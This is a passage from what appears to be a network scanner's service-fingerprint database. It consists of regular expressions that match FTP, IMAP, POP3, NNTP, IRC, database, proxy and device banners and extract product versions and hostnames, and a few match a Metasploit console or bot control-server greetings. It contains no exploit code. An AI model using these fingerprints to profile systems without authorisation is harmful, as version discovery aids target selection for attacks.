FTP Server\.\r\n +220 Welcome to Baby FTP Server\r\n +220 ([\w_.-]+) FTP server \(witelcom ([\d.]+)\) ready\r\n +220 FTP Server \(ZyWALL (USG \w+)\) \[[\w._-]+\]\r\n +220 ALFTP Server ready\. \^-\^\)/~\r\n +220 vxTarget FTP server \(VxWorks ([\d.]+)\) ready\.\r\n +220 ET(\w+) ([\w-]+) Series FTP Server ready\.\r\n +220 aFTPServer ready \(cwd is /\)\r\n +220 FTP version ([\w.]+)\r\n +220 pyftpdlib ([\w._-]+) ready\.\r\n +220 ([\w._-]+) FTP SERVER T9552G07 \(Version ([\w._-]+) TANDEM ([\w._-]+)\) ready\.\r\n +220 [\w._-]+Citizen_CLP([\w._-]+) FTP server \(InterCon version ([\w._-]+)\) ready\.\n +220 Nucleus FTP Server \(Version ([\w._-]+)\) ready\.\r\n +220 Wing FTP Server ([\w._-]+) ready\.\.\.\r\n +220 OpenFTPD server([^ ]+)? +220 Ftp service of Jana-Server ready\r\n +220 Frox transparent ftp proxy\. Login with username\[@host\[:port\]\]\r\n +501 Proxy unable to contact ftp server\r\n +220 ([-.+\w]+) FTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220-Sidewinder ftp proxy\. You must login to the proxy first +220 webshield2 FTP proxy ready\.\r\n +220 WinProxy \(Version ([^)]+)\) ready\.\r\n +220 ([-\w_.]+) FTP proxy \(Version V([\d.]+)\) ready\.\r\n +220 Finjan SurfinGate Proxy - Server Ready\.\r\n +220- ([-\w_.]+) PROXY-FTP server \(DeleGate/([\d.]+)\) ready\.\r\n +500 WinGate Engine Access Denied\r\n +220 IWSS FTP proxy ready\r\n +220 FTP proxy \(v([\d.]+)\) ready\r\n530 Login incorrect\. Expected USER command\r\n +220-Welcome to SpoonProxy V([\w._-]+) by Pi-Soft Consulting, LLC\r\n +220-CCProxy FTP Service\(Unregistered\)\r\n +220 kingate\(([\w._-]+)-win32\) ftp proxy ready\r\n +220 FileCatalyst Server Enterprise v([^\r\n]*)\r\n +220 ([\w._-]+), KEN! DSL FTP-Gateway\r\n +421 Service not available \(The FTP server is not responding\.\)\n +220 (\S+) SVDRP VideoDiskRecorder (\d[^\;]+); +220-\r?\n220 - ftp +\0\0\0\\\x80\x06\0\0\0\n\x01\x03\0\x01\x86\xaf\0\0\0\n\x10\x03\0\0\0\x01\0\0\0\x15\x11\x05FSAE server ([\d.]+)\0\0\0\x16\x12\x01................\0\0\0\x17\x13\x01FSAE_SERVER_\d+ +\0Check Point FireWall-1 authenticated RLogin server running on ([-.\w]+)\r\n\r +220 Fyre rendering server ready\n +\0\0\0\t\0\0\0\x80\0\0\0\0\0\0\0\0\0\0\x042\0\0\0\x01\0\0\t_\0\0\0h +HELLO_BOT\r\n +HELLO_CONTROL_SERVER\r\n +\xff\xfe\x01Genetec Integration Service \(STUDENT03\)\r\n\r\n\r\n\r\n========================================================================\r\n Integration Service Main Menu\r\n========================================================================\r\n\r\n 1\) CONFIG\r\n Displays the configuration settings for the service\r\n\r\n 2\) STATUS\r\n Displays the status of the external systems being run by this\r\n service\.\r\n\r\n \?\) Help\r\n\r\n x\) Exit\r\n========================================================================\r\n +%%QU%%QU%%QU +\nClient limit exceeded\.\n +3Connection to [\d.]+ is denied -- no authorization\.\r\n +GIOP\x01...\0\0\0\0 +\x03\0\0.*@ +\xff\xfd.| p|GNU Gatekeeper +Helpdesk Advanced ([\d.]+) License Logging Service +\(\0\0\0\0\0\0\0..`\0\x01\xff\xff\xff\xcc\xfa\x85\0C\x1d\xe6whfnk\.\.\.E\0\0\0\0\0\0\0\0 +HTTP/1\.1 400 Bad Request\r\n.*\r\n\r\n

Bad Request \(Invalid Verb\)

+HTTP/1\.0 400 Bad Request\r\nContent-Type: text/html\r\nPragma: no-cache\r\nConnection: close\r\nContent-Type: text/html; charset=us-ascii\r\n\r\nInvalid request


This message was created by Kerio Control Proxy {665} +220 JetDirect GGW server \(version (\d[\d.]+)\) ready\r\n +220 HP GGW server \(version ([\w._-]+)\) ready\r\n\0 +00 +01 +\xab\xab\xab\xab\xa0\x81\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\r\n Welcome To\r\n ichat ROOMS (\d[-.\w]+)\r\n== +IceP\x01\0\x01\0\x03\0\x0e\0\0\0 +flock\(\) on closed filehandle .*midentd +\"\0\x04\0 +IUSB \0\0\0\x007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xf1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* OK ([-/.+\w]+) Solstice \(tm\) Internet Mail Server \(tm\) (\d[-.\w]+) IMAP4 service - at +\* OK GroupWise IMAP4rev1 Server Ready\r\n +\* OK \[CAPABILITY IMAP4rev1 .*\] GroupWise Server Ready\r\n +\* OK dbmail imap \(protocol version 4r1\) server (\d[-.\w]+) ready to run\r\n +\* OK ([-.+\w]+) NetMail IMAP4 Agent server ready +\* OK IMAP4 Server \(IMail ([-.\w]+)\) +\* OK ([-.+\w]+) IMAP4rev1 Mercury/32 v(\d[-.\w]+) server ready\.\r\n| p|Mercury/32 imapd +\* OK ([-.\w]+) IMAP4 service \(Netscape Messaging Server (\d[-.\w ]+) \(built ([\w ]+)\)\)\r\n +\* OK eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) IMAP4 server started\r\n +\* OK ([-.\w]+) NetMail IMAP4 Agent server ready <.*>\r\n +\* OK ([-.\w]+) IMAP4rev1 MDaemon (\d[-.\w]+) ready\r\n +\* OK [Dd]ovecot MUA ready\r\n +\* OK \[CAPABILITY IMAP4rev1 SORT THREAD=REFERENCES MULTIAPPEND UNSELECT LITERAL\+ IDLE CHILDREN NAMESPACE LOGIN-REFERRALS [^\]]+\] +\* OK \[CAPABILITY IMAP4rev1 .*?Courier-IMAP ready\. Copyright 1998-\d+ Double Precision, Inc\. See COPYING for distribution information\.\r\n +\* OK CommuniGate Pro IMAP Server ([-.\w]+) at ([-.\w]+) ready\r\n +\* OK \[CAPABILITY IMAP4rev1 CHILDREN NAMESPACE\] Freemail ready - hit me with your rhythm stick\.\r\n +\* OK AVM KEN!4 IMAP Server ready\r\n +\* OK Microsoft Exchange 2000 IMAP4rev1 server version (\d[-.\w]+) \([-.\w]+\) ready\.\r\n +\* OK Der Microsoft Exchange Server 2003 IMAP4rev1-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\* OK Server Microsoft Exchange IMAP4rev1 verze ([\d.]+) \(([-\w_.]+)\) je p\xf8ipraven\.\r\n +\* OK La version ([\d.]+) \(([-\w_.]+)\) du serveur IMAP4rev1 Microsoft Exchange est pr\xeate\r\n +\* OK Microsoft Exchange Server 2003 IMAP4rev1 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\* OK Servidor IMAP4rev1de Microsoft Exchange Server 2003 versi\xf3n ([\w._-]+) \(([\w._-]+)\) listo\.\r\n +\* OK The Microsoft Exchange IMAP4 service is ready\.\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? v([-.\w\+]+) server ready\r\n +\* OK ([-.\w]+) Cyrus IMAP4 v([-.\w\+]+)-Red Hat [-.\w\+]+ server ready\r\n +\* OK ([-\w_.]+) Cyrus IMAP4 v([-\w_.]+)-Debian| p/Cyrus imapd/ v/2/ i|Debian/Ubuntu +\* OK ([-.\w]+) Cyrus IMAP4 v([\w_.]+)-OS X ([\d.]+) server ready\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? Murder v([-.\w]+) server ready\r\n +\* OK Welcome to Binc IMAP v(\d[-.\w]+) +\* OK ([-\w_.]+) Oracle Email Server esimap\t([\d.]+) \t is ready\r\n +\* OK Kerio MailServer ([\d.]+) patch (\d+) IMAP4rev1 server ready\r\n +\* OK Netscape IMAP4rev1 Service ([\d.]+) on ([-\w_.]+) at .*\r\n +\* OK IMAP4 server ready \(Worldmail ([\d.]+)\)\r\n +\* OK HT Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK Softalk IMAP Server ready\r\n +\* OK Welcome to Binc IMAP +\* OK ([-\w_.]+) Mirapoint IMAP4 ([-\w.]+) server ready\r\n +\* OK IMAP4rev1 DvISE Mail Access Server MA-([\w.]+) \(\w+\)\r\n +\* OK IMAP4rev1 GNU mailutils ([\w.]+)\r\n +\* OK IMAP ([-\w_.]+) \(Version ([-\w.]+)\)\r\n +\* OK \[CAPABILITY IMAP4 IMAP4rev1[\w+= -]*\] ([\w._-]+) IMAP4 service \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +\* OK \[CAPABILITY IMAP4[^\]]*\] Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\* OK ([-\w_.]+) IMAP4 service \(iPlanet Messaging Server ([\w. ]+) \(built .*\)\)\r\n +\* OK Anonymous Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) ModusMail IMAP4 Server ([\d.]+) ready\r\n +\* OK IMAP4rev1 Service at Jana-Server ready\r\n +\* OK \]-:\^:-\[ IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) IMAP4 Service ([\d.()]+) at .*\r\n +\* OK CommuniGate Pro IMAP Server ready\r\n +\* OK IMAP4rev1 SmartMax IMAPMax (\d+) Ready\r\n +\+OK X1 ([-\w_.]+)\r\n +\* OK IMAP4rev1 SmarterMail\r\n +\* OK Scalix IMAP server ([\d.]+) ready on ([-\w_.]+)\r\n +\* OK Scalix IMAP server ([\d.]+) on ([-\w_.]+)\r\n +\* OK .* GoMail V([-\w_.]+) IMAP4rev1 +\* OK IMAP4 ready! [-\w_.]+ Winmail Mail Server MagicWinmail Extend IMAP 101\r\n +\* OK ([-\w_.]+) CallPilot IMAP4rev1 v([\d.]+) server ready\.?\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 service ready\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 server ready\r\n +\* OK ([-\w_.]+) DKIMAP4 IMAP Server\r\n +\* OK ArGoSoft Mail Server IMAP Module v\.([\w._-]+) at +\* OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+)\r\n +\* OK MERCUR IMAP4-Server \(v([\w.]+) \w+\) for Windows ready +\* OK Dovecot DA ready\.\r\n +\* OK AXIGEN ([\w._-]+) \(Linux/i686\) IMAP4rev1 service is ready\r\n| p/Axigen imapd/ v/1/ i|Linux/i686 +\* BYE Hi This is the IMAP SSL Redirect\r\n +\* BYE Domino IMAP4 Server Configured for SSL Connections only\. Please reconnect using SSL Port (\d+), .*\r\n +\* OK Kerio Connect ([\w._ -]+) IMAP4rev1 server ready\r\n +\* OK ([\w._-]+) IMAP4rev1 Server PMDF V([\w._-]+) at +\* OK \[CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL\+ NAMESPACE UIDPLUS CHILDREN LANGUAGE XSENDER X-NETSCAPE XSERVERINFO AUTH=PLAIN\] Messaging Multiplexor \(Oracle Communications Messaging Exchange Server ([\w._-]+) \(built (\w+ \d+ \d+)\)\)\r\n +\* OK IMAP4 Ready ([-\w_.]+) \w+\r\n +\* OK ([-\w_.]+) IMAP server ready\r\n +\* OK IMAP4 proxy ready\r\n +\* OK imapfront ready\. \+ portspoof\r\n +\* OK avast! IMAP Proxy\r\n +\* OK \[CAPABILITY IMAP4rev1\] SpamPal for Windows\r\n +\* OK [-.\w,:+ ]+imap[-.\w,:+ ]+\r\n +\* OK Cyrus IMSP version (\d[-.\w]+) ready\r\n +Protocol Error: XML data is not well-formed\. +\d+\0FORWARD\0\x0b\xc2c\x0c\xc1a\x9f@ +\x0e\0\0\0\0\0\0 +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Found your hostname, cached\r\nNOTICE AUTH :\*\*\* Checking Ident\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* No ident response\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* Couldn't look up your hostname\r\n +ERROR..Your host is trying to \(re\)connect too fast -- throttled\r\n +CAPAB START\r\nCAPAB MODULES [\w_-]+\.so, +CAPAB START 1202\r\n +:([\w._-]+) NOTICE ZUSR :You have been throttled for 2 minutes for too many connections in a short period of time\. Further connections in this period will reset your throttle and you will have to wait longer\.\r\n +ERROR Your host is trying to \(re\)connect too fast -- throttled\r\n +IRCXPRO ([\w._-]+)\r\nAUTHREQUEST :Authentication Required\r\n +:([\w._-]+) 451 \* HELP :No te has registrado\r\n +:([\w._-]+) NOTICE AUTH :Minbif-IRCd initialized, please go on\r\n +:.*!psyBNC@lam3rz\.de NOTICE \* : +:.*!psyBNC@[-\w_.]+ NOTICE \* :psyBNC on ([-\w_.]+)\r\n +:sbnc!sbnc@sbnc\.soohrt\.org NOTICE \* :Wellcum\r\n +\0\0\0.\x08\x01\x04\x01\0..\0\0..\0\0.\0\0\0..\0\0\x80\x04..\0.\0\xa0\0\0 +.*\0\x18Ixia Hardware I/O Server\x13Ixia Communications\x18Ixia Hardware I/O Server\x0b([\d.]+) +\r\nWelcome to the Ixia Socket/Serial TCL Server\r\nPress Ctrl-C to reset Tcl Session\r\nIxia> +JDWP-Handshake +cpu: *[\d.]+ mem: *[\d.]+ swp: *[\d.]+\0 +\xde\xca\xfb\xad\x01\0\0\0\x04\0\t\0[\x07\x10] +ksysguardd ([\d.]+)\n\(c\) +\d+ .*\n\x000 succeeded\n\0 +0 succeeded\n\0 +220 ([-.\w]+) LMTP Cyrus v(\d[-.\w]+) ready\r\n +220 ([\w._-]+) Cyrus LMTP Murder v([\w._-]+) server ready\r\n +220 ([-\w_.]+) LMTP Cyrus v([\d.]+)-Red Hat [\d.-]+ ready\r\n +220 ([-\w_.]+) DBMail LMTP service ready to rock\r\n +220 DSPAM LMTP ([-\w_.]+) Ready\r\n +\x01\*Nsure Audit Novell NetWare \[\w+:\w+\]\r\n +LNS READY<> +0001;2 +\x80\0\0\\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\0 +\xc1, +\n.*=\[ msf v([^\r\n]+)\r?\n.*\d+ exploits.*\d+ payloads.*\d+ encoders.*\d+ nops.*msf > +MIDASd v([\w.]+) connection accepted\n\xff +\xff\0\x17Took too long to log in +merovingian:2:\w+:\n +MudNames ([\d.]+) - \(C\) 1997-2001 Ragnar Hojland Espinosa \n\r +# munin node at ([-\w_.]+)\n +MULTIPLICITYP + [\d.:a-f]+ is connected as <\w+>\.\n already connected: (.*?)\.\n +\xd6\x81\x81\0\0\xf9\0\xf9\xee\xe3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x80\0\0\\0\0\0\x01....\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0|s p|Symantec/Veritas Backup Exec ndmp +>>messages/login\r\n----- Welcome to the No Name Go Server \(NNGS\) -----\r\n\r\n +.*\0\0\0\x06\0Donkey\x01\x0c\0\./donkey\.ini\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\xff\xfd\x1f[\r\n* ]+Welcome to MLdonkey \r\n +\xff\xfd\x1fWelcome to MLDonkey ([\d.]+)\n\x1b\[3.mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +\xff\xfd\x1fWelcome to MLdonkey, visit http://mldonkey\.dyndns\.info for new Versions\n\x1b\[34mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +[\x00-\x10]\0\0\0\0\0[^\0]\0\0\0 +\xac\xed\0\x05sr\0\x1elia\.Monitor\.monitor\.monMessage\x8e\xf8\xad\xb0\x14\xe6`!\x02\0\x03L\0\x05identt\0\x12Ljava/lang/Object;L\0\x06resultq\0~\0\x01L\0\x03tagt\0\x12Ljava/lang/String +\n\r\xff\xfbUDo you want ANSI color\? \(Y/n\) | p/ROM-based MUD/ i|http://rrp.rom.org/ +VERSION=MYPROXYv([\w._-]+)\nRESPONSE=1\nERROR=authentication failed\n\0 +.\0\0\0\xffj\x04Host hat keine Berechtigung, eine Verbindung zu diesem MySQL Server herzustellen\. +.\0\0\0\x0a([\w._-]+)\0............\0\x5f\xd1\x2d\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0............\0 +.\0\0\0\n(6\.[-_~.+\w]+)\0...\0 +.\0\0\0\xffj\x04'[\d.]+' .* MySQL +.{128}[\x46-\x53]... +200 NCID Server: ARC_ncidd ([\w._-]+)\r\nCIDLOG: \*DATE\* +Active Internet connections\nProto Recv-Q Send-Q Local Address Foreign Address \(state\)\n +netstat: invalid option -- f\nusage: netstat \[-veenNcCF\] +\x01\0\0\0\x01\0\0\0\0\0\0\0\n\x0c00\d{10} +\x06\x02...([\w._@-]+).. +smbd: error while loading shared libraries: libattr\.so\.1: cannot open shared object file: No such file or directory\n +502 You have no permission to talk\. Goodbye.\r\n +200 NNTP Service Microsoft\xae Internet Services (\d[-.\w]+) Version: \d+\.\d+\.\d+\.\d+ Posting Allowed \r\n +200 ([-.\w]+) DNEWS Version *(\d[-.\w]+).*posting OK \r\n +200 Leafnode NNTP Daemon, version (\d[-.\w]+) running at +200 Lotus Domino NNTP Server for ([-./\w]+) \(Release (\d[-.\w]+), .*\) - Not OK to post\r\n +20. ([-.\w]+) InterNetNews NNRP server INN (\d[-.\w ]+) ready \(no posting\)\.\r\n +200 ArGoSoft News Server for WinNT/2000/XP v ([\d.]+) ready\r\n +200 ([\w.-_]+) NetWare-News-Server/([\d.]+) 'LDNUM' NNRP ready \(posting ok\)\.\r\n +200 ([-\w_.]+) NNRP Service Ready - [-\w_.]+@[-\w_.]+ \(posting ok\)\.\r\n +200 ([-\w_.]+) InterNetNews server INN ([\d.]+) ready\r\n +200 nntp//rss v([\d.]+) news server ready\r\n| p|nntp//rss nntpd +200 Hi, you can post \(sn version ([\w.]+)\)\r\n +200 ([-\w_.]+) NNTP Service Ready, posting permitted\r\n +200 Jana news server ready - posting allowed\r\n +200 NNTP server NOFFLE ([\w.]+)\r\n +502 Could not get your access name\. Goodbye\.\r\n +201 NNTP server ready \(no posting\)\r\n502 No permission\r\n +200 ([-\w_.]+) - colobus ([\d.]+) ready - \(posting ok\)\.\r\n +200 +Kerio MailServer ([\d.]+) +NNTP server ready\r\n +200 NewsCache ([-\w_.]+), accepting NNRP commands\r\n +200 ([\w._-]+) Cyrus NNTP v([\w._-]+) server ready, posting allowed\r\n +200 ([-\w_.]+) ready for action \(Mailtraq ([\d.]+)/NNTP\)\r\n +200 Service available, posting allowed\r\n +200 ([-\w._]+) InterNetNews NNRP server INN (.*) ready \(posting ok\)\r\n +200 [-\[\]\(\)!,/+:<>@.\w ]*nntp[-\[\]\(\)!,/+:<>@.\w ]*\r\n +[4f]\0\0\0V4\x12\0\0\0\0\0\0\0\0\x00[4f]\0\0\0.\0\xf0\0\xd3\x07\t\0.\0.\0.\0.\0.\0..\0\0\0\0.\0\0\0..\0\0.\0 +.\0\x02\0([^\0]+)\0+.\0\x01\0 +200 OK [\d.]+ ([\w._-]+) oco-([\w._-]+) \n +\0X\x08\0\}\x08\r\n\0\.\x08.*\.\.\.\r\n +pbmasterd(\d[-.\w]+)@[-.+\w]+: +PJLINK 1 [0-9a-f]{8}\r +201 Welcome to Poweroff ([\d.]+) created by Jorgen Bosman\r\n +\x01\x04\0\0\0\0\0\rD +NotAuthorized\0\0\0\0\0\0\0\0\0\0\0\0 +usage: [/\w]*/etc/pksd\.conf conf_file\n +version report\n +welcome to the pioneers-meta-server version ([\d.]+)\n +\+ POP2 ([\w._-]+) ([\w._-]+) server ready\r\n +\+OK Ready when you are <200\d+\. +\+OK Internet Rex POP3 server ready < +\+OK DBMAIL pop3 server ready to rock < +\+OK ([-.+\w]+) NetMail POP3 Agent \Re..sion: ([\d.]+) \\r\n +\+OK ([-.+\w]+) Merak (\d[-.\w]+) POP3 +\+OK \]-:\^:-\[ \]-:\^:-\[ POP3 +\+OK POP3 Ready <\d{3,6}\.1[012]\d{8}@([-.\w]+)>\r\n +\+OK [Dd]ovecot ready\.\r\n +\+OK [Dd]ovecot on ([\w._-]+) ready\.\r\n +\+OK Teapop \[v?(\d[-.\w ]+)\] - Teaspoon stirs around again .*\r\n +\+OK ready \r\n +\+OK POP3 server ready \r\n +\+OK AppleMailServer (\d[-.\w]+) POP3 server at ([-.\w]+) ready <\d +\+OK Welcome to MailEnable POP3 Server +\+OK ready <\d{1,5}\.10\d{8}@([-.\w]+)>\r\n +\+OK UCB based pop server \(version (\d[-.\w]+) at sionisten\) starting\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready .* on ([^/]+)/([^\.]+)\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready on +\+OK ([-.\w]+) POP3 service \(Netscape Messaging Server (\d[^(]+) \(built ([\w ]+)\)\)\r\n +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+) server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-Red Hat [-\d.]+ server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-OS X ([\d.]+) server ready < +\+OK ([-\w_.]+) Cyrus POP3 v(\S+Debian\S+) server ready +\+OK X1 NT-POP3 Server ([-\w.]+) \(IMail ([^)]+)\)\r\n +\+OK POP3 \[cppop (\d[^]]+)\] at \[ +\+OK Microsoft Exchange 2000 POP3 server version (\S+).* ready\.\r\n +\+OK Microsoft Exchange POP3 server version (\S+) ready\r\n +\+OK Der Microsoft Exchange Server 2003 POP3-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\+OK Microsoft Exchange Server 2003 POP3 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\+OK Microsoft Exchange POP3-server versie ([\d.]+) is gereed\.\r\n +\+OK \xd1\xe5\xf0\xe2\xe5\xf0 Microsoft Exchange POP3 \xe2\xe5\xf0\xf1\xe8\xe8 ([\d.]+) \xe3\xee\xf2\xee\xe2\r\n +\+OK Le serveur POP3 Microsoft Exchange Server 2003 version ([\d.]+) \(([-\w_.]+)\) est pr\xeat\.\r\n +\+OK Microsoft Exchange POP3 server verze ([\d.]+) je p\xf8ipraven\.\r\n +\+OK Server POP3 di Microsoft Exchange Server 2003 versione ([\w._-]+) \(([\w._-]+)\) pronto\.\r\n +\+OK Microsoft Exchange Server 2007 POP3 service ready\r\n +\+OK ([-.\w]+) POP3 server \(Netscape Mail Server v(\d[-.\w])\) ready +\+OK ArGoSoft Mail Server Freeware, Version \S+ \(([^)]+)\)\r\n +\+OK ArGoSoft Mail Server POP3 Module v\.([\w._-]+) at +\+OK ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-.\w]+ \(([-.\w]+)\)\r\n +\+OK ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ArGoSoft Mail Server Plus for WinNT/2000, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ([-.\w]+) Execmail POP3 \((\d[^)]+)\) +\+OK ([-.\w]+) POP3? MDaemon ready using UNREGISTERED SOFTWARE ([\d.]+) \r\n +\+OK ([-\w_.]+) POP MDaemon ([\d.]+) \xd7\xbc\xb1\xb8\xba\xc3 \r\n +\+OK ([-.\w]+) POP3 server \(Post\.Office v([-.\w]+) release ([-.\w]+) with ZPOP version ([-.\w]+)| p/Post.Office pop3d/ v/2 release 3/ i|w/ZPOP 4 +\+OK CommuniGate Pro POP3 Server ([-.\w]+) ready +\+OK CommuniGate Pro POP3 Server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK\r\n +\+OK POP3 v?([\d.]+) server ready <[\w.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <\w{11}>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready <([-.\w@:]+)>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready < +\+OK Kerio MailServer (\d[-.\w]+) patch ([\d.]+) POP3 server ready <[\d.]+@\(null\)>\r\n +\+OK Stalker POP3 Server ([\w.]+) at ([-\w_.]+) ready <.*>\r\n +\+OK ([-\w_.]+) POP3 service \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK Messaging Multiplexor \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK InterMail POP3 server ready\.\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@unspecified.host>\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +\+OK [-\w_.]+ PopMax version ([\d. ]+) POP3 Mail Server Ready, Willing, and Waiting\r\n +\+OK POP3 Welcome to GNU POP3 ([-\d.]+) <[\d.]+@([-\w_.]+)>\r\n +\+OK popserver ([\d.]+) pop3 server ready\r\n +\+OK ([-\w_.]+) NetMail POP3 Agent \R...sion: ([\d.]+) \\r\n +\+OK POP3 server ready \(Worldmail ([\d.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 WorkgroupMail ([\d.]+) .*\r\n +\+OK POP3 server ready \(LSMTP v([\w.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK MERCUR POP3-Server \(v([\d.]+) \w+\) for Windows NT ready <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready QuickMail Pro Server for MacOS ([\d.]+) <[\w.]+@([-\w_.]+)>\r\n +\+OK ready\r\n +\+OK POP3 ([-\w_.]+) \(Version ([-\w.]+)\) http://surgemail\.com\r\n +\+OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+) < +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) POP3 Server\] service ready; +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) \(Linux/Ix86\) POP3 Server\] service ready; +\+OK Samsung Contact POP3 interface ready on: ([-\w_.]+)\r\n +\+OK ([-\w_.]+) POP3 service \(Sun Java\(tm\) System Messaging Server ([-\d.]+) \(built .*\) +\+OK Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\+OK ([-\w_.]+) POP3 server \(DeskNow POP3 Server ([\d.]+)\) ready \r\n +\+OK POP3 SINA \(([-\d.]+)\) Server Ready\r\n +\+OK POP3 on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +\+OK \(POP3\) hMailServer ([-\w.]+)\r\n +\+OK Welcome to ([\w._-]+), with Code-Crafters Ability Mail Server ([\w._-]+) <[\d.]+@[\w._-]+>\r\n +\+OK DAWKCo POP3 Server v([-\w_.]+) ready < +\+OK Welcome to ([-\w_.]+), powered by Ocean Mail Server ([\d.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) Solstice \(tm\) Internet Mail Server \(tm\) POP3 ([\d.]+) +\+OK Welcome to RaidenMAILD POP3 service v([\d.]+), +\+OK POP3 FTGate6 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK MERCUR POP3-Server \(v([-\w_.]+) \w+\) for Windows ready <[\d.]+@([-\w_.]+)>\r\n +\+OK 4D Mail ([-\w_.]+) ready < +\+OK ([-\w_.]+) POP3 ([-\w_.()]+) w/IMAP client at +\+OK <-?[\d.]+@([-\w_.]+)>, POP3 server ready\.\r\n +\+OK POP3 server ready <[-0-9a-f]+@([-\w_.]+)>\r\n +\+OK Welcome to Arvixe POP3 server\.\r\n +\+OK POP3 Server ready\r\n +\+OK POP3 server ready\r\n +\+OK POP3 server ([-\w_.]+) ready <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) POP3 Server \(Version ([\w.]+)\) ready at <.*>\r\n +\+OK popd-([\d.]+) ready \r\n +\+OK POP3 server at ([-\w_.]+) ready <[\d.]+@ +-ERR Permission denied - closing connection\.\r\n +\+OK ([-\w_.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK ready <[\d.]+@([-\w_.]+)>\r\n +\+OK Scalix POP3 interface ready on: ([-\w_.]+)\r\n +\+OK POP3 Welcome to ([-\w_.]+) using the Internet Anywhere Mail Server Version: ([\d.]+)\. Build: (\d+) by True North Software, Inc\. +\+OK Welcome to mpopd V([\d.]+)\.\.\.\. :\)\r\n +\+OK [-\w_.]+ Welcome to the mail server\.\r\n +\+OK CMailServer ([\d.]+) POP3 Service Ready\r\n +\+OK ([-\w_.]+) running EIMS X ([\w.]+) < +\+OK POP3 server \(Neon Mail Server System Advance ([-\w_.]+), 